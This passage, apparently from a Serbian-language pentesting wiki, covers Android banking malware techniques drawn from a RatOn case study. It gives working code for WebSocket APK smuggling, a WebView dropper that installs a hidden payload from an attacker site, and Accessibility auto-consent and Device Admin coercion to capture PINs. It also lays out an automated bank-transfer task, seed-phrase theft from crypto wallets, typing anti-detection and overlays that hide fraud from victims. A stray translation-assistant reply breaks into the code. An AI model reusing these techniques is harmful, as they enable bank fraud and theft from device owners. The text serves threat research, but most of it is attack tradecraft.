// Accumulate binary chunks and drive fake Play progress UI const chunks = []; socket.on(“chunk”, (chunk) => chunks.push(chunk)); socket.on(“downloadProgress”, (p) => updateProgressBar(p));

// Assemble APK client‑side and trigger browser save dialog socket.on(“downloadComplete”, () => { const blob = new Blob(chunks, { type: “application/vnd.android.package-archive” }); const url = URL.createObjectURL(blob); const a = document.createElement(“a”); a.href = url; a.download = “app.apk”; a.style.display = “none”; document.body.appendChild(a); a.click(); });

</details>

Zašto zaobilazi jednostavne kontrole:
- Nije izložen statički APK URL; payload se rekonstruiše u memoriji iz WebSocket frames.
- URL/MIME/extension filteri koji blokiraju direktne .apk odgovore mogu propustiti binarne podatke tunelovane preko WebSockets/Socket.IO.
- Crawlers i URL sandboxes koji ne izvršavaju WebSockets neće preuzeti payload.

Pogledajte i WebSocket tradecraft i tooling:

<a class="content_ref" href="../../pentesting-web/websocket-attacks.md"><span class="content_ref_label">WebSocket Attacks</span></a>


## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn studija slučaja

Kampanja RatOn banker/RAT (ThreatFabric) je konkretan primer kako moderne mobile phishing operacije kombinuju WebView droppere, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, pa čak i NFC-relay orchestration. Ovaj odeljak apstrahuje ponovo upotrebljive tehnike.

### Stage-1: WebView → native install bridge (dropper)
Napadači prikažu WebView koji pokazuje na napadačevu stranicu i ubacuju JavaScript interfejs koji izlaže native installer. Dodir na HTML dugme poziva native kod koji instalira second-stage APK smešten u assets droppera i zatim ga direktno pokreće.

Minimalni obrazac:

<details>
<summary>Stage-1 dropper minimal pattern (Java)</summary>
```java
public class DropperActivity extends Activity {
@Override protected void onCreate(Bundle b){
super.onCreate(b);
WebView wv = new WebView(this);
wv.getSettings().setJavaScriptEnabled(true);
wv.addJavascriptInterface(new Object(){
@android.webkit.JavascriptInterface
public void installApk(){
try {
PackageInstaller pi = getPackageManager().getPackageInstaller();
PackageInstaller.SessionParams p = new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
int id = pi.createSession(p);
try (PackageInstaller.Session s = pi.openSession(id);
InputStream in = getAssets().open("payload.apk");
OutputStream out = s.openWrite("base.apk", 0, -1)){
byte[] buf = new byte[8192]; int r; while((r=in.read(buf))>0){ out.write(buf,0,r);} s.fsync(out);
}
PendingIntent status = PendingIntent.getBroadcast(this, 0, new Intent("com.evil.INSTALL_DONE"), PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);
pi.commit(id, status.getIntentSender());
} catch (Exception e) { /* log */ }
}
}, "bridge");
setContentView(wv);
wv.loadUrl("https://attacker.site/install.html");
}
}

Niste priložili HTML stranice. Pošaljite sadržaj (HTML/markdown) koji treba da prevedem, pa ću uraditi prevod na srpski uz zadržavanje svih tagova i linkova.

<button onclick="bridge.installApk()">Install</button>

Nakon instalacije, dropper pokreće payload putem explicit package/activity:

Intent i = new Intent();
i.setClassName("com.stage2.core", "com.stage2.core.MainActivity");
startActivity(i);

Ideja za otkrivanje: nepouzdane aplikacije koje pozivaju addJavascriptInterface() i izlažu metode slične installeru WebView-u; APK koji u paketu sadrži ugrađeni sekundarni payload pod assets/ i poziva Package Installer Session API.

Tok pristanka: Accessibility + Device Admin + naknadni runtime upiti

Stage-2 otvara WebView koji hostuje stranicu “Access”. Njen dugme poziva exportovanu metodu koja navodi žrtvu na Accessibility podešavanja i zahteva uključivanje zlonamerne usluge. Nakon odobrenja, malware koristi Accessibility da automatski klikne kroz naredne runtime dijaloge za dozvole (contacts, overlay, manage system settings, itd.) i traži Device Admin.

• Accessibility programatski pomaže prihvatiti kasnije promptove tako što pronalazi dugmad poput “Allow”/“OK” u stablu čvorova i simulira klikove.
• Provera/zahtjev overlay dozvole:

if (!Settings.canDrawOverlays(ctx)) {
Intent i = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
Uri.parse("package:" + ctx.getPackageName()));
ctx.startActivity(i);
}

Vidi takođe:

Accessibility Services Abuse

Overlay phishing/iznuda putem WebView

Operatori mogu izdavati komande za:

• prikazivanje overlay-a preko celog ekrana sa URL-a, ili
• prosleđivanje inline HTML koje se učitava u WebView overlay.

Moguće upotrebe: prisila (unos PIN-a), otvaranje wallet-a da bi se uhvatili PIN-ovi, poruke za iznudu. Obezbediti komandu koja proverava i traži dozvolu za overlay ako nije dodeljena.

Remote control model – tekstualni pseudo-ekran + screen-cast

• Niska propusnost: periodično dump-ovati Accessibility node tree, serijalizovati vidljive tekstove/uloge/koordinate i poslati ih C2 kao pseudo-ekran (komande poput txt_screen jednom i screen_live kontinuirano).
• Velika vernost: zahtevati MediaProjection i pokrenuti screen-casting/snimanje na zahtev (komande kao display / record).

ATS playbook (automacija bankovne aplikacije)

Na osnovu JSON zadatka, otvoriti bank app, upravljati UI preko Accessibility koristeći kombinaciju tekstualnih upita i tapova po koordinatama, i uneti platni PIN žrtve kada se to zatraži.

Example task:

{
"cmd": "transfer",
"receiver_address": "ACME s.r.o.",
"account": "123456789/0100",
"amount": "24500.00",
"name": "ACME"
}

Example texts seen in one target flow (CZ → EN):

• “Nová platba” → “Novo plaćanje”
• “Zadat platbu” → “Unesi uplatu”
• “Nový příjemce” → “Novi primalac”
• “Domácí číslo účtu” → “Domaći broj računa”
• “Další” → “Dalje”
• “Odeslat” → “Pošalji”
• “Ano, pokračovat” → “Da, nastavi”
• “Zaplatit” → “Plati”
• “Hotovo” → “Gotovo”

Operatori mogu takođe proveravati/povećavati limite prenosa putem komandi kao check_limit i limit koje na sličan način navigiraju kroz interfejs za limite.

Crypto wallet seed extraction

Ciljevi uključuju MetaMask, Trust Wallet, Blockchain.com, Phantom. Tok: otključavanje (ukradeni PIN ili dostavljena lozinka), navigacija do Security/Recovery, otkriti/prikazati seed phrase, keylog/exfiltrate it. Implementirajte selektore osetljive na lokalizaciju (EN/RU/CZ/SK) kako biste stabilizovali navigaciju kroz jezike.

Device Admin coercion

Device Admin APIs se koriste za povećanje mogućnosti za PIN-capture i za frustriranje žrtve:

• Neposredno zaključavanje:

dpm.lockNow();

• Isteknite trenutni credential da biste prisilili promenu (Accessibility beleži novi PIN/password):

dpm.setPasswordExpirationTimeout(admin, 1L); // requires admin / often owner

• Primorajte otključavanje bez biometrijske autentifikacije onemogućavanjem biometrijskih funkcija keyguard-a:

dpm.setKeyguardDisabledFeatures(admin,
DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS);

Napomena: Mnogi DevicePolicyManager controls zahtevaju Device Owner/Profile Owner na novijim Android uređajima; neke OEM verzije mogu biti popustljive. Uvek verifikujte na ciljanom OS/OEM.

Orkestracija NFC relay (NFSkate)

Stage-3 može instalirati i pokrenuti eksterni NFC-relay modul (npr. NFSkate) i čak mu proslediti HTML šablon da vodi žrtvu tokom relay-a. Ovo omogućava contactless card-present cash-out pored online ATS.

Pozadina: NFSkate NFC relay.

Skup komandi operatora (primer)

• UI/stanje: txt_screen, screen_live, display, record
• Socijalno: send_push, Facebook, WhatsApp
• Overlay-i: overlay (inline HTML), block (URL), block_off, access_tint
• Novčanici: metamask, trust, blockchain, phantom
• ATS: transfer, check_limit, limit
• Uređaj: lock, expire_password, disable_keyguard, home, back, recents, power, touch, swipe, keypad, tint, sound_mode, set_sound
• Komunikacija/izvidjanje: update_device, send_sms, replace_buffer, get_name, add_contact
• NFC: nfs, nfs_inject

Anti-detekcija ATS zasnovana na Accessibility: ljudska kadenica teksta i dvostruka injekcija teksta (Herodotus)

Napadači sve češće mešaju automatizaciju zasnovanu na Accessibility sa anti-detekcijom podešenom protiv osnovne biometrije ponašanja. Jedan noviji banker/RAT pokazuje dva komplementarna režima isporuke teksta i prekidač operatera za simulaciju ljudskog kucanja sa nasumičnom kadencom.

• Režim otkrivanja: enumeriše vidljive node-ove koristeći selectors i bounds da precizno cilja input polja (ID, text, contentDescription, hint, bounds) pre nego što deluje.
• Dvostruka injekcija teksta:
• Mod 1 – ACTION_SET_TEXT direktno na ciljnom node-u (stabilno, bez keyboard-a);
• Mod 2 – postavljanje clipboard-a + ACTION_PASTE u fokusirani node (radi kada je direktno setText blokirano).
• Ljudska kadenica: podelite string koji obezbeđuje operater i isporučite ga karakter-po-karakter sa nasumičnim kašnjenjima od 300–3000 ms između događaja da bi se izbegle heuristike „machine-speed typing“. Implementirano ili postepenim povećavanjem vrednosti putem ACTION_SET_TEXT, ili lepljenjem po jednom karakteru.

</details>

Overlay-i koji blokiraju za prikrivanje prevare:
- Prikazati preko celog ekrana `TYPE_ACCESSIBILITY_OVERLAY` sa opacitetom pod kontrolom operatora; držati ga neprozirnim za žrtvu dok daljinska automatizacija radi ispod.
- Tipično izložene komande: `opacityOverlay <0..255>`, `sendOverlayLoading <html/url>`, `removeOverlay`.

Minimal overlay sa podesivim alpha:
```java
View v = makeOverlayView(ctx); v.setAlpha(0.92f); // 0..1
WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
MATCH_PARENT, MATCH_PARENT,
WindowManager.LayoutParams.TYPE_ACCESSIBILITY_OVERLAY,
WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE |
WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
PixelFormat.TRANSLUCENT);
wm.addView(v, lp);